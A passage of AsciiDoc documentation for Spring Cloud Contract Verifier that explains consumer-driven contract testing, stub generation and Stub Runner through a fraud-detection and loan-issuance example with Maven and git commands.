`EXPLICIT`,\nrespectively.)\n\nApart from the default JUnit, you can instead use Spock tests, by setting the plugin\n`testFramework` property to `Spock`.\n\nTIP: You can now also generate WireMock scenarios based on the contracts, by including an\norder number followed by an underscore at the beginning of the contract file names.\n\nThe following example shows an auto-generated test in Spock for a messaging stub contract:\n\n [source,groovy,indent=0]\n----\ngiven:\n\t ContractVerifierMessage inputMessage = contractVerifierMessaging.create(\n\t\t\\'\\'\\'{\"bookName\":\"foo\"}\\'\\'\\',\n\t\t['sample': 'header']\n\t)\n\nwhen:\n\t contractVerifierMessaging.send(inputMessage, 'jms:delete')\n\nthen:\n\t noExceptionThrown()\n\t bookWasDeleted()\n----\n\nAs the implementation of the functionalities described by the contracts is not yet\npresent, the tests fail.\n\nTo make them pass, you must add the correct implementation of handling either HTTP\nrequests or messages. Also, you must add a correct base test class for auto-generated\ntests to the project. This class is extended by all the auto-generated tests and should\ncontain all the setup necessary to run them (for example, `RestAssuredMockMvc` controller\nsetup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests pass, and both the\napplication and the stub artifacts are built and installed in the local Maven repository.\nInformation about installing the stubs jar to the local repository appears in the logs, as\nshown in the following example:\n\n[source,bash,indent=0]\n----\n [INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n [INFO]\n [INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n [INFO]\n [INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n [INFO]\n [INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n [INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nYou can now merge the changes and publish both the application and the stub artifacts\nin an online repository.\n\n*Docker Project*\n\nIn order to enable working with contracts while creating applications in non-JVM\ntechnologies, the `springcloud\/spring-cloud-contract` Docker image has been created. It\ncontains a project that automatically generates tests for HTTP contracts and executes them\nin `EXPLICIT` test mode. Then, if the tests pass, it generates Wiremock stubs and,\noptionally, publishes them to an artifact manager. In order to use the image, you can\nmount the contracts into the `\/contracts` directory and set a few environment variables.\n\/\/ TODO: We should answer the obvious question: Which environment variables?\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour-consumer]]\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running\nWireMock instance or messaging route that simulates the actual service.\n\nTo get started, add the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two\nways:\n\n* By checking out the Producer side repository and adding contracts and generating the\nstubs by running the following commands:\n+\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nNOTE: The tests are skipped because the Producer-side contract implementation is not yet\nin place, so the automatically-generated contract tests fail.\n* Getting already existing producer service stubs from a remote repository. To do so,\npass the stub artifact IDs and artifact repository URl as `Spring Cloud Contract Stub\nRunner` properties, as shown in the following example:\n+\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation,\nprovide the `group-id` and `artifact-id` for `Spring Cloud Contract Stub Runner` to run\nthe collaborators' stubs for you, as shown in the following example:\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nTIP: Use the `REMOTE` `stubsMode` when downloading stubs from an online repository and\n`LOCAL` for offline work.\n\nIn your integration test, you can receive stubbed versions of HTTP responses or messages\nthat are expected to be emitted by the collaborator service. You can see entries similar\nto the following in the build logs:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\n\n==== Defining the Contract\n\nAs consumers of services, we need to define what exactly we want to achieve. We need to\nformulate our expectations. That is why we write contracts.\n\nAssume that you want to send a request containing the ID of a client company and the\namount it wants to borrow from us. You also want to send it to the \/fraudcheck url via\nthe PUT method.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\n==== Client Side\n\nSpring Cloud Contract generates stubs, which you can use during client-side testing.\nYou get a running WireMock instance\/Messaging route that simulates the service.\nYou would like to feed that instance with a proper stub definition.\n\nAt some point in time, you need to send a request to the Fraud Detection service.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation provide the group id and artifact id for the Stub Runner to download stubs of your collaborators.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nAfter that, during the tests, Spring Cloud Contract automatically finds the stubs\n(simulating the real service) in the Maven repository and exposes them on a configured\n(or random) port.\n\n==== Server Side\n\nSince you are developing your stub, you need to be sure that it actually resembles your\nconcrete implementation. You cannot have a situation where your stub acts in one way and\nyour application behaves in a different way, especially in production.\n\nTo ensure that your application behaves the way you define in your stub, tests are\ngenerated from the stub you provide.\n\nThe autogenerated test looks, more or less, like this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\n=== Step-by-step Guide to Consumer Driven Contracts (CDC)\n\nConsider an example of Fraud Detection and the Loan Issuance process. The business\nscenario is such that we want to issue loans to people but do not want them to steal from\nus. The current implementation of our system grants loans to everybody.\n\nAssume that `Loan Issuance` is a client to the `Fraud Detection` server. In the current\nsprint, we must develop a new feature: if a client wants to borrow too much money, then\nwe mark the client as a fraud.\n\nTechnical remark - Fraud Detection has an `artifact-id` of `http-server`, while Loan\nIssuance has an artifact-id of `http-client`, and both have a `group-id` of `com.example`.\n\nSocial remark - both client and server development teams need to communicate directly and\ndiscuss changes while going through the process. CDC is all about communication.\n\nThe https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-server[server\nside code is available here] and https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-client[the\nclient code here].\n\nTIP: In this case, the producer owns the contracts. Physically, all the contract are\nin the producer's repository.\n\n==== Technical note\n\nIf using the *SNAPSHOT* \/ *Milestone* \/ *Release Candidate* versions please add the\nfollowing section to your build:\n\n[source,xml,indent=0,subs=\"verbatim,attributes\",role=\"primary\"]\n.Maven\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=repos,indent=0]\n----\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\",role=\"secondary\"]\n.Gradle\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/build.gradle[tags=deps_repos,indent=0]\n----\n\n==== Consumer side (Loan Issuance)\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server), you might do the following steps:\n\n. Start doing TDD by writing a test for your feature.\n. Write the missing implementation.\n. Clone the Fraud Detection service repository locally.\n. Define the contract locally in the repo of Fraud Detection service.\n. Add the Spring Cloud Contract Verifier plugin.\n. Run the integration tests.\n. File a pull request.\n. Create an initial implementation.\n. Take over the pull request.\n. Write the missing implementation.\n. Deploy your app.\n. Work online.\n\n*Start doing TDD by writing a test for your feature.*\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=client_tdd,indent=0]\n----\n\nAssume that you have written a test of your new feature. If a loan application for a big\namount is received, the system should reject that loan application with some description.\n\n*Write the missing implementation.*\n\nAt some point in time, you need to send a request to the Fraud Detection service. Assume\nthat you need to send the request containing the ID of the client and the amount the\nclient wants to borrow. You want to send it to the `\/fraudcheck` url via the `PUT` method.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nFor simplicity, the port of the Fraud Detection service is set to `8080`, and the\napplication runs on `8090`.\n\nIf you start the test at this point, it breaks, because no service currently runs on port\n`8080`.\n\n*Clone the Fraud Detection service repository locally.*\n\nYou can start by playing around with the server side contract. To do so, you must first\nclone it.\n\n[source,bash,indent=0]\n----\n$ git clone https:\/\/your-git-server.com\/server-side.git local-http-server-repo\n----\n\n*Define the contract locally in the repo of Fraud Detection service.*\n\nAs a consumer, you need to define what exactly you want to achieve. You need to formulate\nyour expectations. To do so, write the following contract:\n\nIMPORTANT: Place the contract under `src\/test\/resources\/contracts\/fraud` folder. The `fraud` folder\nis important because the producer's test base class name references that folder.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\nThe YML contract is quite straight-forward. However when you take a look at the Contract\nwritten using a statically typed Groovy DSL - you might wonder what the\n`value(client(...), server(...))` parts are. By using this notation, Spring Cloud\nContract lets you define parts of a JSON block, a URL, etc., which are dynamic. In case\nof an identifier or a timestamp, you need not hardcode a value. You want to allow some\ndifferent ranges of values. To enable ranges of values, you can set regular expressions\nmatching those values for the consumer side. You can provide the body by means of either\na map notation or String with interpolations.\nhttps:\/\/cloud.spring.io\/spring-cloud-contract\/single\/spring-cloud-contract.html#_contract_dsl[Consult the docs\nfor more information.] We highly recommend using the map notation!\n\nTIP: You must understand the map notation in order to set up contracts. Please read the\nhttp:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON].\n\nThe previously shown contract is an agreement between two sides that:\n\n- if an HTTP request is sent with all of\n** a `PUT` method on the `\/fraudcheck` endpoint,\n** a JSON body with a `client.id` that matches the regular expression `[0-9]{10}` and\n`loanAmount` equal to `99999`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`,\n- then an HTTP response is sent to the consumer that\n** has status `200`,\n** contains a JSON body with the `fraudCheckStatus` field containing a value `FRAUD` and\nthe `rejectionReason` field having value `Amount too high`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`.\n\nOnce you are ready to check the API in practice in the integration tests, you need to\ninstall the stubs locally.\n\n*Add the Spring Cloud Contract Verifier plugin.*\n\nWe can add either a Maven or a Gradle plugin. In this example, you see how to add Maven.\nFirst, add the `Spring Cloud Contract` BOM.\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_bom,indent=0]\n----\n\nNext, add the `Spring Cloud Contract Verifier` Maven plugin\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nSince the plugin was added, you get the `Spring Cloud Contract Verifier` features which,\nfrom the provided contracts:\n\n- generate and run tests\n- produce and install stubs\n\nYou do not want to generate tests since you, as the consumer, want only to play with the\nstubs. You need to skip the test generation and execution. When you execute:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\n\nIn the logs, you see something like this:\n\n[source,bash,indent=0]\n----\n[INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n[INFO]\n[INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n[INFO]\n[INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n[INFO]\n[INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n[INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe following line is extremely important:\n\n[source,bash,indent=0]\n----\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nIt confirms that the stubs of the `http-server` have been installed in the local\nrepository.\n\n*Run the integration tests.*\n\nIn order to profit from the Spring Cloud Contract Stub Runner functionality of automatic\nstub downloading, you must do the following in your consumer side project (`Loan\nApplication service`):\n\nAdd the `Spring Cloud Contract` BOM:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=contract_bom,indent=0]\n----\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the\n`group-id` and `artifact-id` for the Stub Runner to download the stubs of your\ncollaborators. (Optional step) Because you're playing with the collaborators offline, you\ncan also provide the offline work switch (`StubRunnerProperties.StubsMode.LOCAL`).\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nNow, when you run your tests, you see something like this:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\nThis output means that Stub Runner has found your stubs and started a server for your app\nwith group id `com.example`, artifact id `http-server` with version `0.0.1-SNAPSHOT` of\nthe stubs and with `stubs` classifier on port `8080`.\n\n*File a pull request.*\n\nWhat you have done until now is an iterative process. You can play around with the\ncontract, install it locally, and work on the consumer side until the contract works as\nyou wish.\n\nOnce you are satisfied with the results and the test passes, publish a pull request to\nthe server side. Currently, the consumer side work is done.\n\n==== Producer side (Fraud Detection server)\n\nAs a developer of the Fraud Detection server (a server to the Loan Issuance service):\n\n*Create an initial implementation.*\n\nAs a reminder, you can see the initial implementation here:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\n*Take over the pull request.*\n\n[source,bash,indent=0]\n----\n$ git checkout -b contract-change-pr master\n$ git pull https:\/\/your-git-server.com\/server-side-fork.git contract-change-pr\n----\n\nYou must add the dependencies needed by the autogenerated tests:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nIn the configuration of the Maven plugin, pass the `packageWithBaseClasses` property\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nIMPORTANT: This example uses \"convention based\" naming by setting the\n`packageWithBaseClasses` property. Doing so means that the two last packages combine to\nmake the name of the base test class. In our case, the contracts were placed under\n`src\/test\/resources\/contracts\/fraud`. Since you do not have two packages starting from\nthe `contracts` folder, pick only one, which should be `fraud`. Add the `Base` suffix and\ncapitalize `fraud`. That gives you the `FraudBase` test class name.\n\nAll the generated tests extend that class. Over there, you can set up your Spring Context\nor whatever is necessary. In this case, use http:\/\/rest-assured.io\/[Rest Assured MVC] to\nstart the server side `FraudDetectionController`.\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/java\/com\/example\/fraud\/FraudBase.java[]\n----\n\nNow, if you run the `.\/mvnw clean install`, you get something like this:\n\n[source,bash,indent=0]\n----\nResults :\n\nTests in error:\n ContractVerifierTest.validate_shouldMarkClientAsFraud:32 \u00bb IllegalState Parsed...\n----\n\nThis error occurs because you have a new contract from which a test was generated and it\nfailed since you have not implemented the feature. The auto-generated test would look\nlike this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nIf you used the Groovy DSL, you can see, all the `producer()` parts of the Contract that were present in the\n`value(consumer(...), producer(...))` blocks got injected into the test.\nIn case of using YAML, the same applied for the `matchers` sections of the `response`.\n\nNote that, on the producer side, you are also doing TDD. The expectations are expressed\nin the form of a test. This test sends a request to our own application with the URL,\nheaders, and body defined in the contract. It also is expecting precisely defined values\nin the response. In other words, you have the `red` part of `red`, `green`, and\n`refactor`. It is time to convert the `red` into the `green`.\n\n*Write the missing implementation.*\n\nBecause you know the expected input and expected output, you can write the missing\nimplementation:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=new_impl,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\nWhen you execute `.\/mvnw clean install` again, the tests pass. Since the `Spring Cloud\nContract Verifier` plugin adds the tests to the `generated-test-sources`, you can\nactually run those tests from your IDE.\n\n*Deploy your app.*\n\nOnce you finish your work, you can deploy your change. First, merge the branch:\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n$ git push origin master\n----\n\nYour CI might run something like `.\/mvnw clean deploy`, which would publish both the\napplication and the stub artifacts.\n\n==== Consumer Side (Loan Issuance) Final Step\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server):\n\n*Merge branch to master.*\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n----\n\n*Work online.*\n\nNow you can disable the offline work for Spring Cloud Contract Stub Runner and indicate\nwhere the repository with your stubs is located. At this moment the stubs of the server\nside are automatically downloaded from Nexus\/Artifactory. You can set the value of\n`stubsMode` to `REMOTE`. The following code shows an example of\nachieving the same thing by changing the properties.\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nThat's it!\n\n=== Dependencies\n\nThe best way to add dependencies is to use the proper `starter` dependency.\n\nFor `stub-runner`, use `spring-cloud-starter-stub-runner`. When you use a plugin, add\n`spring-cloud-starter-contract-verifier`.\n\n=== Additional Links\n\nHere are some resources related to Spring Cloud Contract Verifier and Stub Runner. Note\nthat some may be outdated, because the Spring Cloud Contract Verifier project is under\nconstant development.\n\n==== Spring Cloud Contract video\n\nYou can check out the video from the Warsaw JUG about Spring Cloud Contract:\n\nvideo::sAAklvxmPmk[youtube,start=538,width=640,height=480]\n\n==== Readings\n\n- http:\/\/www.slideshare.net\/MarcinGrzejszczak\/stick-to-the-rules-consumer-driven-contracts-201507-confitura[Slides from Marcin Grzejszczak's talk about Accurest]\n- http:\/\/toomuchcoding.com\/blog\/categories\/accurest\/[Accurest related articles from Marcin Grzejszczak's blog]\n- http:\/\/toomuchcoding.com\/blog\/categories\/spring-cloud-contract\/[Spring Cloud Contract related articles from Marcin Grzejszczak's blog]\n- http:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON]\n\n=== Samples\n\nYou can find some samples at\nhttps:\/\/github.com\/spring-cloud-samples\/spring-cloud-contract-samples[samples].\n","old_contents":"== Spring Cloud Contract Verifier Introduction\n\nTIP: The Accurest project was initially started by Marcin Grzejszczak and Jakub Kubrynski\n(http:\/\/codearte.io[codearte.io])\n\nSpring Cloud Contract Verifier enables Consumer Driven Contract (CDC) development of\nJVM-based applications. It moves TDD to the level of software architecture.\n\nSpring Cloud Contract Verifier ships with _Contract Definition Language_ (CDL). Contract\ndefinitions are used to produce the following resources:\n\n* JSON stub definitions to be used by WireMock when doing integration testing on the\nclient code (_client tests_). Test code must still be written by hand, and test data is\nproduced by Spring Cloud Contract Verifier.\n* Messaging routes, if you're using a messaging service. We integrate with Spring\nIntegration, Spring Cloud Stream, Spring AMQP, and Apache Camel. You can also set your\nown integrations.\n* Acceptance tests (in JUnit or Spock) are used to verify if server-side implementation\nof the API is compliant with the contract (__server tests__). A full test is generated by\nSpring Cloud Contract Verifier.\n\n=== Why a Contract Verifier?\n\nAssume that we have a system consisting of multiple microservices:\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Deps.png[Microservices Architecture]\n\n==== Testing issues\n\nIf we wanted to test the application in top left corner to determine whether it can\ncommunicate with other services, we could do one of two things:\n\n- Deploy all microservices and perform end-to-end tests.\n- Mock other microservices in unit\/integration tests.\n\nBoth have their advantages but also a lot of disadvantages.\n\n*Deploy all microservices and perform end to end tests*\n\nAdvantages:\n\n- Simulates production.\n- Tests real communication between services.\n\nDisadvantages:\n\n- To test one microservice, we have to deploy 6 microservices, a couple of databases,\netc.\n- The environment where the tests run is locked for a single suite of tests (nobody else\nwould be able to run the tests in the meantime).\n- They take a long time to run.\n- The feedback comes very late in the process.\n- They are extremely hard to debug.\n\n*Mock other microservices in unit\/integration tests*\n\nAdvantages:\n\n- They provide very fast feedback.\n- They have no infrastructure requirements.\n\nDisadvantages:\n\n- The implementor of the service creates stubs that might have nothing to do with\nreality.\n- You can go to production with passing tests and failing production.\n\nTo solve the aforementioned issues, Spring Cloud Contract Verifier with Stub Runner was\ncreated. The main idea is to give you very fast feedback, without the need to set up the\nwhole world of microservices. If you work on stubs, then the only applications you need\nare those that your application directly uses.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Stubs2.png[Stubbed Services]\n\nSpring Cloud Contract Verifier gives you the certainty that the stubs that you use were\ncreated by the service that you're calling. Also, if you can use them, it means that they\nwere tested against the producer's side. In short, you can trust those stubs.\n\n=== Purposes\n\nThe main purposes of Spring Cloud Contract Verifier with Stub Runner are:\n\n- To ensure that WireMock\/Messaging stubs (used when developing the client) do exactly\nwhat the actual server-side implementation does.\n- To promote ATDD method and Microservices architectural style.\n- To provide a way to publish changes in contracts that are immediately visible on both\nsides.\n- To generate boilerplate test code to be used on the server side.\n\nIMPORTANT: Spring Cloud Contract Verifier's purpose is NOT to start writing business\nfeatures in the contracts. Assume that we have a business use case of fraud check. If a\nuser can be a fraud for 100 different reasons, we would assume that you would create 2\ncontracts, one for the positive case and one for the negative case. Contract tests 